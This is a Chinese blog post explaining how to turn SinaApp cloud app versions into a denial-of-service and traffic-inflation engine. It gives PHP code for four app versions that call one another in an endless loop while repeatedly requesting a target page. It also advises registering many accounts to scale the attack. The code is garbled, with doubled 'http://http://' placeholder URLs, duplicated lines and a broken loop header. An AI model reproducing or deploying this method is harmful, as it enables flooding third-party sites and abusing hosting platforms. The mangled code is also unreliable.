说是DDOS攻击，实际上还可以用来刷流量和排名。估计这个想法很多大牛之前已经有想过，昨天在使用sinaapp时测试了下，貌似可行，所以和大家分享下。

　　大牛小牛应该都知道sinaapp、百度site app等都为开发者提供了很好的开放平台，注册也很简单。每个用户可以创建不同版本的app应用，攻击者可以利用该特点，注册大量用户，编写PHP代码对目标发起攻击，在测试过程中，我使用了一个帐号，创建了4个版本的APP进行测试，在自己站点上写了个记录访问者ip的文件作为被攻击者，效果不错，该记录文件每秒的容量暴涨(说明app访问被攻击者网站的频率很高)。下面看下测试步骤：

　　PS：主要使用sinaapp作为测试对象。

　　测试思路：创建4个版本的app.

　　版本1 主页代码如下:

　　php

　　file_get_contents('http://http://www.zjjv.com///');//版本1触发攻击(访问版本2)

　　?>　　file_get_contents('http://http://www.zjjv.com///');//版本1触发攻击(访问版本2)

　　>　　file_get_contents('http://http://www.zjjv.com///');//版本1触发攻击(访问版本2)

　　>

　　版本2 主页代码:

　　php

　　file_get_contents('http://http://www.zjjv.com///ip.php')://攻击目标

　　file_get_contents('http://http://www.zjjv.com///');//访问版本3

　　?>　　file_get_contents('http://http://www.zjjv.com///ip.php')://攻击目标

　　file_get_contents('http://http://www.zjjv.com///');//访问版本3

　　>　　file_get_contents('http://http://www.zjjv.com///ip.php')://攻击目标

　　file_get_contents('http://http://www.zjjv.com///');//访问版本3

　　>

　　版本3 主页代码:

　　for ($i=1; $<　　for ($i=1; $<　　for ($i=1; $<=10; $i++){//这里邪恶了一下，多来几次效果更佳

　　file_get_contents('http://http://www.zjjv.com///ip.php');

　　file_get_contents('http://http://www.zjjv.com///'); }

　　>

　　版本4 主页代码:

　　file_get_contents('http://http://www.zjjv.com///');//访问版本2，导致死循环

　　?>　　file_get_contents('http://http://www.zjjv.com///');//访问版本2，导致死循环

　　>　　file_get_contents('http://http://www.zjjv.com///');//访问版本2，导致死循环

　　>

　　以上是使用一个sinaapp用户进行攻击的步骤，可以自己扩展，注册大量用户及创建更多的版本进行攻击。但在测试过程中发现，每个APP实际上有两个IP出口。使用多个用户效果会更好。

　　PS:大家应该会有个疑问，为什么要创建版本4，这个我也是在实验中发现的，如果使用版本2和版本3直接互调，则达不到攻击的效果，版本2和版本3只访问被攻击目标一次旧停止了。有哪位大牛知道为什么的还请不惜赐教.